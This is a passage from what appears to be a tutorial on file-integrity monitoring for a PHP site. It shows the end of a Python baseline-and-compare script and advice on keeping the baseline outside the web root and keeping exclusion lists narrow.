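    os.remove(os.path.join(root, "catalog/old.php"))
    return compare(load_baseline(baseline_file), snapshot(root))

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Two points on the exclusion list. Keep the baseline file itself outside the web root, as `demo()` does, or an attacker who can write to the site can rewrite the baseline along with the files. And exclude as narrowly as you can: if the churn under `vendors/` comes from a cache subdirectory inside that library, excluding just that subdirectory keeps the library's own PHP files under watch, whereas excluding the whole of `vendors/` means code dropped there is never reported.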